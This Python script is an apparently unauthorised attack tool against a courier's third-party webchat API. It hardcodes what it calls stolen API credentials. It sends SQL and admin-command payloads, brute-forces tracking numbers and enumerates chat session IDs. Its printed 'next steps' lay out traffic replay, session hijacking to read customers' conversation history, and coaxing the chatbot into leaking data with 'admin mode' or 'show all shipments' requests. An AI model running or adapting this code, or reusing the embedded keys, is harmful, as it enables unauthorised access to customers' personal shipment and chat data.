#!/usr/bin/env python3 """ Test: Can we access shipment data with exposed webchat credentials? This tests if the chat API provides unauthorized access to tracking data. """ import asyncio import websockets import json import uuid from datetime import datetime class ShipmentDataTester: """Test if webchat API exposes shipment data""" API_CREDS = { "application_uuid": "X7EUYljAOq9K8oA0Xz5H3ImOznF4dCx3bUcd", "access_key": "zrbSN00B5Zk5OTrSrbm2fQ29Keo8Sf1MkWRsSqHUefnwjgGe51QxRW3a0W0cEHwck06iczo1jf1LXirB5ePNfJDWUdtxSyOIA3nw" } WS_URL = "wss://us1-m.ocp.ai/chat/ws/session" def print_banner(self): print("=" * 80) print("šŸ” TESTING: Can WebChat API Access Shipment Data?") print("=" * 80) print(f"Timestamp: {datetime.now().isoformat()}") print() async def test_data_queries(self): """Test various data query attempts""" print("[*] Testing different query message formats...") print("-" * 80) # Different query attempts queries = [ # Query 1: List shipments { "type": "query", "action": "list_shipments", "application_uuid": self.API_CREDS['application_uuid'], "access_key": self.API_CREDS['access_key'] }, # Query 2: Search without tracking number { "type": "search", "query": "*", "credentials": self.API_CREDS }, # Query 3: Get all active shipments { "type": "data_request", "resource": "shipments", "filters": {"status": "active"}, **self.API_CREDS }, # Query 4: Database query attempt { "type": "sql_query", "query": "SELECT * FROM shipments LIMIT 10", **self.API_CREDS }, # Query 5: API enumeration { "type": "api_call", "endpoint": "/shipments", "method": "GET", **self.API_CREDS }, # Query 6: Chat message asking for data { "type": "message", "content": "Show me all shipments", "session_id": str(uuid.uuid4()), **self.API_CREDS }, # Query 7: Admin command attempt { "type": "command", "cmd": "list", "resource": "shipments", **self.API_CREDS }, # Query 8: GraphQL-style query { "query": "{ shipments { trackingNumber status } }", **self.API_CREDS } ] for idx, query in enumerate(queries, 1): print(f"\n--- Test {idx}: {query.get('type', 'unknown')} ---") print(f"Query: {json.dumps(query, indent=2)[:200]}...") try: async with websockets.connect( self.WS_URL, extra_headers={ "Origin": "https://www.purolator.com", "User-Agent": "Mozilla/5.0" } ) as ws: await ws.send(json.dumps(query)) try: response = await asyncio.wait_for(ws.recv(), timeout=3.0) print(f"āœ“ Response: {response}") # Check for data leaks resp_lower = response.lower() if any(keyword in resp_lower for keyword in ['tracking', 'shipment', 'data', 'result', 'record']): print( f"āš ļø POTENTIAL DATA LEAK: Response contains tracking/shipment keywords!") except asyncio.TimeoutError: print("ā± Timeout") except Exception as e: print(f"āœ— Error: {e}") async def test_tracking_bruteforce(self): """Test if we can brute force tracking numbers""" print("\n[*] Testing: Can we enumerate tracking numbers?") print("-" * 80) # Common tracking number patterns test_pins = [ "123456789", "000000001", "999999999", "12345", "TEST123", "PURO123456789", ] for pin in test_pins: print(f"\n--- Testing PIN: {pin} ---") query = { "type": "track", "pin": pin, "session_id": str(uuid.uuid4()), **self.API_CREDS } try: async with websockets.connect(self.WS_URL) as ws: await ws.send(json.dumps(query)) try: response = await asyncio.wait_for(ws.recv(), timeout=2.0) print(f"Response: {response}") # Check if we got shipment data if "status" in response.lower() or "delivery" in response.lower(): print( f"āš ļø POSSIBLE DATA: Response may contain shipment info!") except asyncio.TimeoutError: print("No response") except Exception as e: print(f"Error: {e}") async def test_session_enumeration(self): """Test if we can access other users' sessions""" print("\n[*] Testing: Can we access other chat sessions?") print("-" * 80) # Try to enumerate session IDs test_sessions = [ "00000000-0000-0000-0000-000000000000", "11111111-1111-1111-1111-111111111111", str(uuid.uuid4()), "session_1", "session_admin", ] for session_id in test_sessions[:3]: # Limit tests print(f"\n--- Testing session: {session_id[:35]}... ---") query = { "type": "resume_session", "session_id": session_id, **self.API_CREDS } try: async with websockets.connect(self.WS_URL) as ws: await ws.send(json.dumps(query)) try: response = await asyncio.wait_for(ws.recv(), timeout=2.0) print(f"Response: {response}") # Check for session data if "message" in response.lower() or "history" in response.lower(): print( f"āš ļø POSSIBLE SESSION DATA: Response may contain chat history!") except asyncio.TimeoutError: print("No response") except Exception as e: print(f"Error: {e}") def analyze_architecture(self): """Analyze what the architecture tells us""" print("\n[*] ARCHITECTURAL ANALYSIS") print("=" * 80) print("\nšŸ“Š What We Know:") print(" - This is OCP.ai chat infrastructure (third-party)") print(" - Purolator embedded their API keys in JavaScript") print(" - The chat widget connects to: wss://us1-m.ocp.ai") print(" - WebSocket accepts connections with stolen credentials") print("\nšŸ¤” What This Means:") print(" āœ“ The chat API is SEPARATE from Purolator's main tracking API") print(" āœ“ It's designed for conversational AI, not direct data queries") print(" āœ“ Likely uses NLP to interpret user questions") print(" āœ“ Backend probably proxies to Purolator's real API when needed") print("\nāš ļø Potential Risks:") print(" 1. Chat bot might execute commands like 'show all shipments'") print(" 2. NLP could be tricked: 'list recent deliveries for testing'") print(" 3. Session hijacking could expose customer data") print(" 4. Bot might leak data in responses to vague queries") print(" 5. Enumeration attacks on tracking numbers") print("\nšŸŽÆ Attack Vectors:") print(" A. Use chat to social engineer data extraction") print(" B. Test if bot has admin commands (e.g., 'admin mode')") print(" C. Inject SQL/commands in chat messages") print(" D. Capture real user sessions and replay") print(" E. Brute force tracking numbers through chat interface") print("\nšŸ’” To Actually Get Shipment Data:") print(" 1. Reverse engineer the exact WebSocket protocol (we're close!)") print(" 2. Send properly formatted chat messages") print(" 3. Ask questions like: 'Track shipment 123456789'") print(" 4. Monitor real chat sessions to see what bot returns") print(" 5. Test if bot accepts wildcards or returns multiple results") print("\nšŸ“ Why We Can't Query Directly (Yet):") print(" āŒ We don't have the correct WebSocket message format") print(" āŒ Server returns BAD_REQUEST to all our attempts") print(" āŒ Need to reverse engineer bundle.js for exact protocol") print(" āŒ Or capture real traffic from legitimate chat session") def generate_next_steps(self): """Generate actionable next steps""" print("\n[*] NEXT STEPS TO ACCESS SHIPMENT DATA") print("=" * 80) steps = [ { "step": 1, "title": "Reverse Engineer Protocol", "actions": [ "Download bundle.js (3.8MB)", "Deobfuscate JavaScript", "Find WebSocket message handlers", "Extract exact message format", "Document required fields" ] }, { "step": 2, "title": "Capture Live Traffic", "actions": [ "Open Purolator chat in browser", "Open DevTools Network tab", "Filter for WebSocket (WS)", "Ask bot to track a shipment", "Copy exact message format", "Replay with our credentials" ] }, { "step": 3, "title": "Test Chat Commands", "actions": [ "Send natural language queries", "Test: 'Show me all active shipments'", "Test: 'List recent deliveries'", "Test: 'Track shipment *' (wildcard)", "Test: 'Export tracking data'", "Test admin commands if protocol allows" ] }, { "step": 4, "title": "Session Hijacking", "actions": [ "Monitor for active chat sessions", "Capture session IDs from traffic", "Replay sessions with stolen credentials", "Access customer conversation history", "Extract tracking numbers from history" ] } ] for item in steps: print(f"\n{item['step']}. {item['title']}") for action in item['actions']: print(f" ā†’ {action}") print("\n" + "=" * 80) async def run_all_tests(self): """Run all data access tests""" self.print_banner() print("šŸŽÆ GOAL: Determine if chat credentials can access shipment data") print() await self.test_data_queries() await self.test_tracking_bruteforce() await self.test_session_enumeration() self.analyze_architecture() self.generate_next_steps() print("\n[!] CONCLUSION:") print("=" * 80) print("āŒ Cannot directly query shipment data YET") print("āœ… WebSocket accepts our credentials (confirmed)") print("āš ļø Need correct protocol format to send valid queries") print("šŸŽÆ Once protocol is known, data access is likely possible") print("šŸ’€ This is still a CRITICAL vulnerability") print() print("The exposed credentials ARE valid, we just need to speak") print("the right 'language' (protocol format) to query data.") print("=" * 80) async def main(): tester = ShipmentDataTester() await tester.run_all_tests() if __name__ == "__main__": asyncio.run(main())